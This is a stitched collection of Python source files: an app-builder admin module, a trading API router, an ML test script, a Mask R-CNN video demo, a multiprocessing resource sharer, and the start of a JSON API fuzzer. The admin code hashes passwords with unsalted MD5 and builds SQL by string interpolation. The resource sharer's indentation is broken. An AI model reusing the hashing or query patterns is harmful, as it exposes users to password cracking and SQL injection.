        names = ',<br>'.join(ind_list)
        mess = item.task.language('field_used_in_indices') % \
            {'field': item.f_field_name.value, 'indexes': names}
        return mess
    # 3. Filters bound to this field.
    field_id = item.id.value
    filters = item.task.sys_filters.copy()
    filters.filters.owner_rec_id.value = item.owner_rec_id.value
    filters.open()
    filters_list = []
    for fltr in filters:
        if fltr.f_field.value == field_id:
            filters_list.append(fltr.f_filter_name.value)
    if len(filters_list):
        names = ',<br>'.join(filters_list)
        mess = item.task.language('field_used_in_filters') % \
            {'field': item.f_field_name.value, 'filters': names}
        return mess
###############################################################################
# sys_indices #
###############################################################################
def update_index(delta):
    """Return True when the index delta must be applied to a physical table
    (the owner item is not a virtual table, or no owner record is found)."""
    owner = delta.task.sys_items.copy()
    owner.set_where(id=delta.owner_rec_id.value)
    owner.open()
    if not owner.record_count():
        return True
    return not owner.f_virtual_table.value
def change_foreign_index(delta):
    """Build the SQL to (re)create a foreign-key index on SQLite.

    SQLite cannot alter foreign keys in place, so the whole table is recreated
    with an identical field list and the index delta applied.
    """
    items = delta.task.sys_items.copy()
    items.filters.id.value = delta.owner_rec_id.value
    items.open()
    it_fields = items.details.sys_fields
    it_fields.open()
    fields = get_table_fields(items, it_fields)
    # Same columns before and after — only the foreign key changes.
    new_fields = list(fields)
    return items.recreate_table_sql(db_modules.SQLITE, fields, new_fields, delta)
def indices_insert_sql(item, delta, table_name=None, new_fields=None, manual_update=False, foreign_key_dict=None):
    """Return the CREATE INDEX SQL for an inserted index record, or None when
    no database change is needed (manual update or virtual table).

    On SQLite a foreign index without an explicit field list requires a full
    table rebuild (see change_foreign_index).
    """
    if not manual_update and update_index(delta):
        if not table_name:
            table_name = delta.task.sys_items.field_by_id(delta.owner_rec_id.value, 'f_table_name')
        db_type = get_db_type(item.task)
        if db_type == db_modules.SQLITE and delta.f_foreign_index.value:
            if not new_fields:
                return change_foreign_index(delta)
        else:
            return delta.create_index_sql(db_type, table_name, new_fields=new_fields, foreign_key_dict=foreign_key_dict)
def indices_execute_insert(item, delta, manual_update):
    """Create the index in the project database (if required), then persist
    the index metadata record.

    Raises Exception when index creation fails.
    """
    sql = indices_insert_sql(item, delta, manual_update=manual_update)
    if sql:
        error = execute(item.task, delta.task_id.value, sql)
        if error:
            raise Exception(item.task.language('error_creating_index') % (delta.f_index_name.value.upper(), error))
    sql = delta.apply_sql()
    return item.task.execute(sql)
def indices_delete_sql(item, delta, manual_update=False):
    """Return the DROP INDEX SQL for a deleted index record, or None when no
    database change is needed.

    On SQLite a foreign index can only be removed via a table rebuild.
    """
    if not manual_update and update_index(delta):
        db_type = get_db_type(item.task)
        if db_type == db_modules.SQLITE and delta.f_foreign_index.value:
            return change_foreign_index(delta)
        else:
            return delta.delete_index_sql(db_type)
def indices_execute_delete(item, delta, manual_update):
    """Drop the index from the project database (if required), then delete
    the index metadata record.

    Raises Exception when dropping the index fails.
    """
    sql = indices_delete_sql(item, delta, manual_update)
    if sql:
        error = execute(item.task, delta.task_id.value, sql)
        if error:
            raise Exception(item.task.language('error_deleting_index') % error)
    sql = delta.apply_sql()
    return item.task.execute(sql)
def indices_apply_changes(item, delta, params):
    """on_apply handler for sys_indices: route the delta to the insert or
    delete executor; returns the executor result or None when nothing ran.
    """
    # Bug fix: `result` was unbound (UnboundLocalError) when the owner item
    # had no table name or the record was modified rather than inserted or
    # deleted; default to None so the return is always valid.
    result = None
    manual_update = params['manual_update']
    table_name = item.task.sys_items.field_by_id(delta.owner_rec_id.value, 'f_table_name')
    if table_name:
        if delta.rec_inserted():
            result = indices_execute_insert(item, delta, manual_update)
        elif delta.rec_deleted():
            result = indices_execute_delete(item, delta, manual_update)
    return result
def server_dump_index_fields(item, dest_list):
    """RPC wrapper: serialize an index field list for storage."""
    return common.store_index_fields(dest_list)
def server_load_index_fields(item, value):
    """RPC wrapper: deserialize a stored index field list."""
    return common.load_index_fields(value)
###############################################################################
# sys_roles #
###############################################################################
def users_on_apply(item, delta, params):
    """on_apply handler for sys_users: hash each changed record's plain-text
    password into f_psw_hash before it is saved.

    SECURITY NOTE: MD5 is a fast, unsalted digest and is not suitable for
    password storage; it is kept here only for compatibility with already
    stored hashes.  Migrating to hashlib.pbkdf2_hmac/scrypt would require
    rehashing existing users.
    """
    for d in delta:
        d.edit()
        d.f_psw_hash.value = hashlib.md5(d.f_password.value.encode("utf8")).hexdigest()
        d.post()
def privileges_table_get_select(item, query):
    """on_open handler for role_privileges: return (rows, error_message) with
    one row per visible item joined to the role's privilege record (if any).
    """
    owner_id = query['__master_id']
    owner_rec_id = query['__master_rec_id']
    result_sql = \
    """
    SELECT P.ID, P.DELETED, P.OWNER_ID,
    P.OWNER_REC_ID,
    I.ID,
    O.F_NAME,
    P.F_CAN_VIEW,
    P.F_CAN_CREATE,
    P.F_CAN_EDIT,
    P.F_CAN_DELETE,
    I.F_NAME AS ITEM_ID_LOOKUP
    FROM (SYS_ITEMS AS I
    LEFT JOIN SYS_ITEMS AS O ON O.ID = I.PARENT
    LEFT JOIN SYS_PRIVILEGES AS P ON P.ITEM_ID = I.ID AND P.DELETED = 0 and P.OWNER_ID = %s AND P.OWNER_REC_ID = %s)
    WHERE I.DELETED = 0 AND I.TYPE_ID >= 10
    ORDER BY O.F_NAME
    """
    result_sql = result_sql % (owner_id, owner_rec_id)
    error_mes = ''
    # Bug fix: `rows` was unbound when select() raised, turning a reported
    # database error into a NameError at the return statement.
    rows = []
    try:
        rows = item.task.select(result_sql)
    except Exception as e:
        error_mes = error_message(e)
    return rows, error_mes
def roles_changed(item):
    """Invalidate the cached privileges so they are reloaded on next access."""
    item.task.app.privileges = None
def privileges_open(item, params):
    """on_open handler for sys_privileges: return (rows, error_message) with
    one row per role joined to its privilege record for the given item.
    """
    item_id = params['item_id']
    result_sql = \
    """
    SELECT p.ID,
    p.DELETED,
    %s AS OWNER_ID,
    r.ID AS OWNER_REC_ID,
    %s AS ITEM_ID,
    "" AS OWNER_ITEM,
    p."F_CAN_VIEW",
    p."F_CAN_CREATE",
    p."F_CAN_EDIT",
    p."F_CAN_DELETE",
    r."F_NAME" AS "ITEM_ID_LOOKUP"
    FROM (SYS_ROLES AS r LEFT JOIN "SYS_PRIVILEGES" AS p ON p."OWNER_REC_ID" = r."ID" AND
    p."DELETED" = 0 AND ITEM_ID = %s)
    WHERE r."DELETED" = 0
    ORDER BY "ITEM_ID_LOOKUP"
    """
    result_sql = result_sql % (item.task.sys_roles.ID, item_id, item_id)
    error_mes = ''
    # Bug fix: `rows` was unbound when select() raised, turning a reported
    # database error into a NameError at the return statement.
    rows = []
    try:
        rows = item.task.select(result_sql)
    except Exception as e:
        error_mes = error_message(e)
    return rows, error_mes
###############################################################################
# sys_langs #
###############################################################################
def add_lang(item, lang_id, language, country, name, abr, rtl, copy_lang):
    """RPC wrapper: create a language, optionally copying from *copy_lang*."""
    langs.add_lang(item.task, lang_id, language, country, name, abr, rtl, copy_lang)
def save_lang_field(item, lang_id, field_name, value):
    """RPC wrapper: save one attribute of a language record."""
    langs.save_lang_field(item.task, lang_id, field_name, value)
def get_lang_translation(item, lang1, lang2):
    """RPC wrapper: return the side-by-side translation of two languages."""
    return langs.get_lang_translation(item.task, lang1, lang2)
def save_lang_translation(item, lang_id, key_id, value):
    """RPC wrapper: save one translated value for a language key."""
    langs.save_lang_translation(item.task, lang_id, key_id, value)
def add_key(item, key):
    """RPC wrapper: add a new translation key."""
    return langs.add_key(item.task, key)
def del_key(item, key_id):
    """RPC wrapper: delete a translation key."""
    return langs.del_key(item.task, key_id)
def export_lang(item, lang_id, host):
    """RPC wrapper: export a language; returns the export location/result."""
    return langs.export_lang(item.task, lang_id, host)
def import_lang(item, file_path):
    """RPC wrapper: import a language file relative to the task work dir."""
    return langs.import_lang(item.task, os.path.join(item.task.work_dir, file_path))
def register_events(task):
    """Wire up the admin task: register every RPC entry point callable from
    the builder client and attach dataset event handlers.

    Called once when the admin/builder task is constructed.
    """
    # Task-level RPC functions.
    task.register(server_check_connection)
    task.register(server_set_task_name)
    task.register(server_set_project_langage)
    # ~ task.register(server_change_secret_key)
    task.register(server_update_has_children)
    task.register(server_export_task)
    task.register(server_import_task)
    task.register(server_find_in_task)
    task.register(server_web_print_code)
    task.register(server_item_info)
    task.register(server_get_task_dict)
    task.register(server_save_edit)
    task.register(server_file_info)
    task.register(server_save_file)
    task.register(get_fields_next_id)
    task.register(get_lookup_list)
    task.register(server_get_db_options)
    task.register(server_create_task)
    task.register(server_get_table_names)
    task.register(server_import_table)
    task.register(server_get_task_info)
    task.register(server_can_delete_lookup_list)
    task.register(server_valid_item_name)
    task.register(server_get_primary_key_type)
    task.register(server_set_literal_case)
    task.register(get_new_table_name)
    task.register(create_system_item)
    task.register(create_detail_index)
    # Dataset apply/open handlers.
    task.sys_params.on_apply = do_on_apply_param_changes
    task.sys_users.on_apply = users_on_apply
    task.sys_tasks.on_apply = do_on_apply_param_changes
    task.sys_items.register(server_can_delete)
    task.sys_items.register(server_group_is_empty)
    task.sys_items.register(server_load_interface)
    task.sys_items.register(server_store_interface)
    task.sys_items.register(server_update_details)
    task.sys_items.on_apply = items_apply_changes
    task.sys_fields.register(server_can_delete_field)
    task.sys_filters.on_apply = do_on_apply_changes
    task.sys_report_params.on_apply = do_on_apply_changes
    task.sys_indices.on_apply = indices_apply_changes
    task.sys_indices.register(server_dump_index_fields)
    task.sys_indices.register(server_load_index_fields)
    task.role_privileges.on_open = privileges_table_get_select
    task.sys_privileges.on_open = privileges_open
    task.sys_roles.register(roles_changed)
    # Language/translation RPC functions.
    task.sys_langs.register(get_lang_translation)
    task.sys_langs.register(save_lang_field)
    task.sys_langs.register(save_lang_translation)
    task.sys_langs.register(add_lang)
    task.sys_langs.register(add_key)
    task.sys_langs.register(del_key)
    task.sys_langs.register(export_lang)
    task.sys_langs.register(import_lang)
|
api.py | import threading
import jesse.helpers as jh
from jesse.models import Order
class API:
    """Routing layer mapping an exchange name to its driver instance.

    In live mode each driver is a websocket-backed exchange class started on
    its own thread; otherwise every considered exchange gets a Sandbox driver.
    """
    def __init__(self) -> None:
        self.drivers = {}
        # Sandbox drivers are cheap, so build them eagerly when not live.
        # NOTE(review): in live mode initiate_drivers is presumably invoked
        # later by the live plugin — confirm against callers.
        if not jh.is_live():
            self.initiate_drivers()
    def initiate_drivers(self) -> None:
        for e in jh.get_config('app.considering_exchanges'):
            if jh.is_live():
                def initiate_ws(exchange_name: str) -> None:
                    # Runs on a worker thread: resolve and start the live driver.
                    from jesse_live.info import SUPPORTED_EXCHANGES, SUPPORTED_EXCHANGES_NAMES
                    exchange_class = jh.get_config(f'app.live_drivers.{exchange_name}')
                    if exchange_name not in SUPPORTED_EXCHANGES_NAMES:
                        exchange_names = ''
                        for se in SUPPORTED_EXCHANGES:
                            exchange_names += f'\n "{se["name"]}"'
                        error_msg = f'Driver for "{exchange_name}" is not supported yet. Supported exchanges are: {exchange_names}'
                        jh.error(error_msg, force_print=True)
                        jh.terminate_app()
                    self.drivers[exchange_name] = exchange_class()
                # Pass the exchange as an arg so the thread binds the current value.
                threading.Thread(target=initiate_ws, args=[e]).start()
            else:
                from jesse.exchanges import Sandbox
                self.drivers[e] = Sandbox(e)
    # The order methods below simply forward to the matching driver.
    def market_order(self, exchange: str, symbol: str, qty: float, current_price: float, side: str, role: str,
                     flags: str) -> Order:
        return self.drivers[exchange].market_order(symbol, qty, current_price, side, role, flags)
    def limit_order(self, exchange: str, symbol: str, qty: float, price: float, side: str, role: str,
                    flags: str) -> Order:
        return self.drivers[exchange].limit_order(symbol, qty, price, side, role, flags)
    def stop_order(self, exchange: str, symbol: str, qty: float, price: float, side: str, role: str,
                   flags: str) -> Order:
        return self.drivers[exchange].stop_order(symbol, qty, price, side, role, flags)
    def cancel_all_orders(self, exchange: str, symbol: str) -> bool:
        return self.drivers[exchange].cancel_all_orders(symbol)
    def cancel_order(self, exchange: str, symbol: str, order_id: str) -> bool:
        return self.drivers[exchange].cancel_order(symbol, order_id)
# Module-level singleton shared by the rest of the application.
api = API()
|
test.py | import sys
sys.path.append("/scratch/wdjo224/deep_protein_binding")
import torch
torch.manual_seed(0)
import os
import time
import pandas as pd
import numpy as np
from tqdm import tqdm
from itertools import chain
from torch.utils.data.sampler import SubsetRandomSampler
from torch.utils.data import DataLoader
from src.model import MPNN
from src.MoleculeDataset import MoleculeDatasetCSV
from src.utils import collate_fn, get_loss, get_parser
# TODO: output feature vectors
# TODO: set variables as volatile=true
debug = False  # set True for a quick single-molecule smoke run with console output
args = get_parser().parse_args()
# Bug fix: np.int was deprecated in NumPy 1.20 and removed in 1.24; it was an
# alias for the builtin int, so this change is behavior-preserving.
test_idxs = np.array_split(np.fromfile(args.test_idxs, dtype=int), args.n_test_process)
output_path = "/scratch/wdjo224/deep_protein_binding/experiments/" + args.exp_name + "/test_results/{}".format(args.pid)
def test(rank, model):
    """Worker entry point: evaluate this worker's shard of test indices.

    Parameters:
        rank: index of this worker; selects the shard from test_idxs.
        model: trained MPNN already switched to eval mode.

    Writes a per-rank CSV of (idx, loss, pred, true) rows under output_path
    unless debug is set, in which case the head is printed instead.
    """
    idxs = test_idxs[rank]
    print("pid: {}".format(os.getpid()))
    result_summary = None
    molecules = MoleculeDatasetCSV(
        csv_file=args.D,
        corrupt_path=args.c, target=args.target, scaling=args.scale)
    loss_fn = get_loss(args)
    # Bug fix: time.clock() was removed in Python 3.8; process_time() keeps
    # the "cpu seconds" semantics of the original measurement.
    start_time = time.process_time()
    for idx in idxs:
        # One loader per index: evaluates exactly this molecule.
        molecule_loader = DataLoader(molecules, batch_size=1, sampler=SubsetRandomSampler([idx]),
                                     collate_fn=collate_fn, num_workers=0)
        for batch in molecule_loader:
            val_dict = model.validation_step(batch=batch, loss_fn=loss_fn)
            # Accumulate one row per target key for this molecule.
            result_summary = pd.concat([result_summary, pd.DataFrame(({"idx": idx,
                                        "loss": val_dict["batch_dict"][key]["loss"][0],
                                        "pred": val_dict["batch_dict"][key]["pred"][0],
                                        "true": val_dict["batch_dict"][key]["true"][0]}
                                        for key in val_dict["batch_dict"].keys()), index=[0])],
                                       axis=0)
        if debug:
            break
    end_time = time.process_time()
    print("evaluation finished in {} cpu seconds. writing results...".format((end_time-start_time)))
    # pred/true hold tensors with messy shapes; convert to numpy for CSV output.
    result_summary.pred = result_summary.pred.apply(lambda x: x.data.numpy())
    result_summary.true = result_summary.true.apply(lambda x: x.data.numpy())
    result_summary = result_summary.reset_index()
    if debug:
        print(result_summary.head())
    else:
        result_summary.to_csv(output_path+"/test_results_{}.csv".format(rank))
def main():
    """Load the trained model and fan out evaluation over n_test_process
    worker processes, each handling one shard of the test indices."""
    print("{:=^100}".format(' Test '))
    print("run parameters: {}".format(sys.argv))
    import torch.multiprocessing as mp
    # NOTE(review): file_system sharing avoids fd-limit issues when passing
    # tensors between processes — confirm it is actually required here.
    mp.set_sharing_strategy("file_system") #is this necessary?
    # if output path does not exist, create it
    if not os.path.exists(output_path):
        os.makedirs(output_path)
    model = MPNN(T=args.T, p=args.p, target=args.target, output_type=args.output_type, output_dim=args.output_dim,
                 readout_dim=args.readout_dim)
    model.load_state_dict(torch.load(args.model_path))
    model.eval()
    processes = []
    for rank in range(args.n_test_process):
        p = mp.Process(target=test, args=(rank, model))
        p.start()
        processes.append(p)
    print("joining {} processes.".format(len(processes)))
    for p in processes:
        p.join()
# Standard script entry point.
if __name__ == "__main__":
    main()
|
demoMp4.py | import os
import sys
import random
import math
import numpy as np
import skimage.io
import matplotlib
import matplotlib.pyplot as plt
from multiprocessing import Process,Queue
# import coco
from coco import coco
# import utils
from mrcnn import utils
from mrcnn import model as modellib
import cv2
import colorsys
# Project root and locations of the training logs and pretrained COCO weights.
ROOT_DIR = os.getcwd()
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
COCO_MODEL_PATH = os.path.join(ROOT_DIR, "../mask_rcnn_coco.h5")
# Download the pretrained weights once if they are not present locally.
if not os.path.exists(COCO_MODEL_PATH):
    utils.download_trained_weights(COCO_MODEL_PATH)
# Number of frames pushed through the network per detect() call.
IMAGES_BATCH = 21
class InferenceConfig(coco.CocoConfig):
    # Inference config: one GPU processing a whole batch of frames per pass.
    GPU_COUNT = 1
    # IMAGES_PER_GPU = 1
    IMAGES_PER_GPU = IMAGES_BATCH
config = InferenceConfig()
# Build the Mask R-CNN in inference mode and load the pretrained COCO weights.
model = modellib.MaskRCNN(mode="inference", model_dir=MODEL_DIR, config=config)
model.load_weights(COCO_MODEL_PATH, by_name=True)
# COCO class names; index 0 is the background class.
class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
               'bus', 'train', 'truck', 'boat', 'traffic light',
               'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',
               'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
               'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
               'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',
               'kite', 'baseball bat', 'baseball glove', 'skateboard',
               'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',
               'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
               'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',
               'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',
               'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
               'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
               'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
               'teddy bear', 'hair drier', 'toothbrush']
# Video source; swap for cv2.VideoCapture(0) to use a webcam instead.
cap = cv2.VideoCapture("test.mp4")
#cap = cv2.VideoCapture(0)
# height = 720
# width = 1280
# height = 800
# width = 800
# height = 360
# width = 640
# height = 180
# width = 320
# Frame size fed to the network (frames are resized to width x height).
height = 600
width = 600
def random_colors(N, bright=True):
    """Generate N visually distinct RGB colors (tuples of floats in [0, 1]).

    Colors are spread evenly around the HSV hue wheel and then shuffled so
    adjacent instances do not get adjacent hues.
    """
    value = 1.0 if bright else 0.7
    colors = [colorsys.hsv_to_rgb(index / N, 1, value) for index in range(N)]
    random.shuffle(colors)
    return colors
def apply_mask(image, mask, color, alpha=0.5):
    """Alpha-blend *color* into *image* (in place) wherever *mask* == 1.

    *color* is an RGB triple of floats in [0, 1]; *alpha* is the blend weight
    of the color.  Returns the mutated image.
    """
    for channel in range(3):
        original = image[:, :, channel]
        blended = original * (1 - alpha) + alpha * color[channel] * 255
        image[:, :, channel] = np.where(mask == 1, blended, original)
    return image
def display_instances(image, boxes, masks, class_ids, class_names,
                      scores=None, title="",
                      figsize=(16, 16), ax=None):
    """Draw detection boxes, labels and masks onto a copy of *image* and
    return it as uint8.

    boxes: (N, 4) [y1, x1, y2, x2]; masks: (H, W, N); class_ids: (N,).
    """
    N = boxes.shape[0]
    if not N:
        print("\n*** No instances to display *** \n")
        # Bug fix: the function previously fell through to `return
        # masked_image` with the variable unbound (UnboundLocalError);
        # return the unmodified frame instead.
        return image.astype(np.uint8)
    assert boxes.shape[0] == masks.shape[-1] == class_ids.shape[0]
    colors = random_colors(N)
    masked_image = image.copy()
    for i in range(N):
        color = colors[i]
        # Bounding box — skip padded (all-zero) box slots.
        if not np.any(boxes[i]):
            continue
        y1, x1, y2, x2 = boxes[i]
        camera_color = (color[0] * 255, color[1] * 255, color[2] * 255)
        cv2.rectangle(masked_image, (x1, y1), (x2, y2), camera_color , 1)
        # Label
        class_id = class_ids[i]
        score = scores[i] if scores is not None else None
        label = class_names[class_id]
        x = random.randint(x1, (x1 + x2) // 2)
        caption = "{} {:.3f}".format(label, score) if score else label
        camera_font = cv2.FONT_HERSHEY_PLAIN
        cv2.putText(masked_image,caption,(x1, y1),camera_font, 1, camera_color)
        # Mask
        mask = masks[:, :, i]
        masked_image = apply_mask(masked_image, mask, color)
    return masked_image.astype(np.uint8)
def putImages(q):
    """Producer process: read IMAGES_BATCH frames from the global capture,
    resize them and push the stacked (B, H, W, 3) batch onto queue *q*."""
    while(True):
        for i in range(IMAGES_BATCH):
            # Grab a frame from the video stream.
            ret, frame = cap.read()
            # Resize the camera image.
            # NOTE(review): `ret` is never checked — cv2.resize will raise
            # once the stream ends; presumably the source loops. Verify.
            image_cv2 = cv2.resize(frame,(width,height))
            if i == 0:
                images = np.array([image_cv2])
            else:
                images = np.append(images,[image_cv2],axis=0)
        q.put(images)
def main():
    """Consume frame batches from a producer process, run Mask R-CNN on each
    batch, and display the annotated frames with an FPS overlay."""
    # FPS measurement
    tm = cv2.TickMeter()
    tm.start()
    count = 0
    max_count = IMAGES_BATCH * 2
    fps = 0
    while(True):
        # for i in range(IMAGES_BATCH):
        #     # Grab a frame from the video stream
        #     ret, frame = cap.read()
        #     # Resize the camera image
        #     image_cv2 = cv2.resize(frame,(width,height))
        #     if i == 0:
        #         images = np.array([image_cv2])
        #     else:
        #         images = np.append(images,[image_cv2],axis=0)
        # Spawn a fresh producer each iteration and take one batch from it.
        Q = Queue()
        P = Process(target=putImages,args=(Q,))
        P.start()
        images = Q.get()
        print(len(images))
        P.join()
        tm.reset()
        tm.start()
        # t1 = tm.getTimeSec()
        results = model.detect(images)
        # FPS measurement
        # if count == max_count:
        #     tm.stop()
        #     fps = max_count / tm.getTimeSec()
        #     tm.reset()
        #     tm.start()
        #     count = 0
        #     print('fps: {:.2f}'.format(fps))
        tm.stop()
        # t2 = tm.getTimeSec()
        # print(t2-t1)
        fps = len(results) / tm.getTimeSec()
        # tm.reset()
        # tm.start()
        count = 0
        print('fps: {:.2f}'.format(fps))
        # NOTE(review): `frame` is not defined in this scope (the read loop
        # above is commented out) — this line raises NameError at runtime;
        # it likely should draw on each `images[i]` or be removed.
        cv2.putText(frame, 'FPS: {:.2f}'.format(fps),(10,30),
                   cv2.FONT_HERSHEY_SIMPLEX,1.0,(0,255,0),thickness=2)
        for i in range(IMAGES_BATCH):
            r = results[i]
            camera = display_instances(images[i], r['rois'], r['masks'], r['class_ids'],
                                class_names, r['scores'])
            cv2.imshow("camera window", camera)
            count += 1
            # print(i)
        # Exit when Esc is pressed.
        if cv2.waitKey(1) == 27:
            break
    # Cleanup.
    cap.release()
    cv2.destroyAllWindows()
# Standard script entry point.
if __name__ == '__main__':
    main()
resource_sharer.py | #
# We use a background thread for sharing fds on Unix, and for sharing sockets on
# Windows.
#
# A client which wants to pickle a resource registers it with the resource
# sharer and gets an identifier in return.  The unpickling process connects
# to the resource sharer, sends the identifier and its pid, and then receives
# the resource.
#
import os
import signal
import socket
import sys
import threading
from . import process
from .context import reduction
from . import util
__all__ = ['stop']
if sys.platform == 'win32':
__all__ += ['DupSocket']
    class DupSocket(object):
        '''Picklable wrapper for a socket.'''
        def __init__(self, sock):
            # Duplicate so this wrapper owns an independent handle whose
            # lifetime is managed by the resource sharer.
            new_sock = sock.dup()
            def send(conn, pid):
                # Runs on the sharer thread: share the handle with process pid.
                share = new_sock.share(pid)
                conn.send_bytes(share)
            self._id = _resource_sharer.register(send, new_sock.close)
        def detach(self):
            '''Get the socket.  This should only be called once.'''
            with _resource_sharer.get_connection(self._id) as conn:
                share = conn.recv_bytes()
                return socket.fromshare(share)
else:
__all__ += ['DupFd']
    class DupFd(object):
        '''Wrapper for fd which can be used at any time.'''
        def __init__(self, fd):
            # Duplicate so this wrapper owns an independent descriptor whose
            # lifetime is managed by the resource sharer.
            new_fd = os.dup(fd)
            def send(conn, pid):
                # Runs on the sharer thread: pass the fd to process pid.
                reduction.send_handle(conn, new_fd, pid)
            def close():
                os.close(new_fd)
            self._id = _resource_sharer.register(send, close)
        def detach(self):
            '''Get the fd.  This should only be called once.'''
            with _resource_sharer.get_connection(self._id) as conn:
                return reduction.recv_handle(conn)
class _ResourceSharer(object):
'''Manager for resources using background thread.'''
    def __init__(self):
        self._key = 0            # monotonically increasing resource identifier
        self._cache = {}         # key -> (send, close) callbacks
        self._old_locks = []     # keeps pre-fork locks alive (see _afterfork)
        self._lock = threading.Lock()
        self._listener = None
        self._address = None
        self._thread = None
        # Reset all state in the child after a fork.
        util.register_after_fork(self, _ResourceSharer._afterfork)
def register(self, send, close):
'''Register resource, returning an identifier.'''
with self._lock:
if self._address is None:
self._start()
self._key += 1
self._cache[self._key] = (send, close)
return (self._address, self._key)
@staticmethod
def get_connection(ident):
'''Return connection from which to receive identified resource.'''
from .connection import Client
address, key = ident
c = Client(address, authkey=process.current_process().authkey)
c.send((key, os.getpid()))
return c
def stop(self, timeout=None):
'''Stop the background thread and clear registered resources.'''
from .connection import Client
with self._lock:
if self._address is not None:
c = Client(self._address,
authkey=process.current_process().authkey)
c.send(None)
c.close()
self._thread.join(timeout)
if self._thread.is_alive():
util.sub_warning('_ResourceSharer thread did '
'not stop when asked')
self._listener.close()
self._thread = None
self._address = None
self._listener = None
for key, (send, close) in self._cache.items():
close()
self._cache.clear()
def _afterfork(self):
for key, (send, close) in self._cache.items():
close()
self._cache.clear()
# If self._lock was locked at the time of the fork, it may be broken
# -- see issue 6721. Replace it without letting it be gc'ed.
self._old_locks.append(self._lock)
self._lock = threading.Lock()
if self._listener is not None:
self._listener.close()
self._listener = None
self._address = None
self._thread = None
def _start(self):
from .connection import Listener
assert self._listener is None, "Already have Listener"
util.debug('starting listener and thread for sending handles')
self._listener = Listener(authkey=process.current_process().authkey)
self._address = self._listener.address
t = threading.Thread(target=self._serve)
t.daemon = True
t.start()
self._thread = t
def _serve(self):
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, range(1, signal.NSIG))
while 1:
try:
with self._listener.accept() as conn:
msg = conn.recv()
if msg is None:
break
key, destination_pid = msg
send, close = self._cache.pop(key)
try:
send(conn, destination_pid)
finally:
close()
except:
if not util.is_exiting():
sys.excepthook(*sys.exc_info())
# Module-level singleton; ``stop`` is re-exported as the module's public API.
_resource_sharer = _ResourceSharer()
stop = _resource_sharer.stop
|
pjfapi.py | """
PyJFAPI - CLI json API fuzzer
PyJFAPI perform automatic analysis of JSON API using PyJFuzz fuzzing
framework (https://www.github.com/mseclab/PyJFuzz), the automatic analysis will extract
just the useful request which may lead to security flaws. If you found this tool useful
please leave a comment on GitHub!
MIT License
Copyright (c) 2017 Daniele Linguaglossa
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from BaseHTTPServer import BaseHTTPRequestHandler
try:
from pyjfuzz.lib import PJFConfiguration
from pyjfuzz.lib import PJFFactory
except ImportError:
print "[!] Can't find PyJFuzz API library, please install with: 'git clone https://github.com/mseclab/PyJFuzz.git'"
print "[!] One done install with: 'sudo python setup.py install'"
exit(-1)
from argparse import Namespace
from StringIO import StringIO
from threading import Thread
from threading import Lock
import multiprocessing
import argparse
import httplib
import hashlib
import socket
import signal
import urllib
import Queue
import time
import json
import ssl
import sys
import os
import re
# Global queue feeding the printer thread; serializes all console output.
print_queue = Queue.Queue(0)
def printer_thread():
    """
    Console printer loop: drains the global print_queue so that several
    threads/processes never interleave their writes on stdout.
    """
    while True:
        try:
            # Drain every pending message before going back to sleep.
            while not print_queue.empty():
                message = print_queue.get()
                sys.stdout.write("[INFO] {0}\n".format(message))
                # mark the message as handled and fetch the next one
                print_queue.task_done()
            # short nap to avoid spinning the CPU
            time.sleep(0.1)
        except KeyboardInterrupt:
            # ctrl+c: leave the loop so the daemon thread can terminate
            break
def init_printer():
    """
    Start the daemonized printer thread (see printer_thread above).
    """
    pthread = Thread(target=printer_thread, args=())
    # Assign the daemon attribute directly; setDaemon() is a deprecated alias.
    # Daemon so the process can exit even while the printer is still running.
    pthread.daemon = True
    pthread.start()
class HTTPRequestParser(BaseHTTPRequestHandler):
    """Parse a plain-text HTTP request into headers + body and serialize it back.

    Python 2 only: relies on BaseHTTPServer/StringIO and on the mimetools
    ``headers.headers`` raw-line list.
    """
    def __init__(self, request_text):
        """
        Parse the request headers plus body
        :param request_text: full HTTP request as a CRLF-delimited string
        """
        # rfile contains the full http message
        self.rfile = StringIO(request_text)
        self.raw_requestline = self.rfile.readline()
        # get errors during parsing
        self.error_code = self.error_message = None
        # parse the message
        self.parse_request()
        tmp = {}
        # restore original headers (CamelCase); each raw line ends with "\r\n",
        # hence the [:-2] slice before splitting on ": "
        for header in self.headers.headers:
            key, val = header[:-2].split(": ")
            tmp.update({key: val})
        self.headers = tmp
        # Put connection to close in order to prevent socket bottleneck
        if "Connection" in self.headers:
            self.headers["Connection"] = "close"
        else:
            self.headers.update({"Connection": "close"})
        # delete the content-length header since it will be updated by httplib during requests
        if "Content-Length" in self.headers:
            del self.headers["Content-Length"]
        # wfile will contains just the message body (POST)
        # NOTE(review): raises IndexError if the request has no blank line
        # separating headers from body -- fix_request() normalizes to CRLF first
        self.wfile = StringIO(request_text.split("\r\n\r\n", 1)[1])
        self._body = self.wfile.read()
    def send_error(self, code, message):
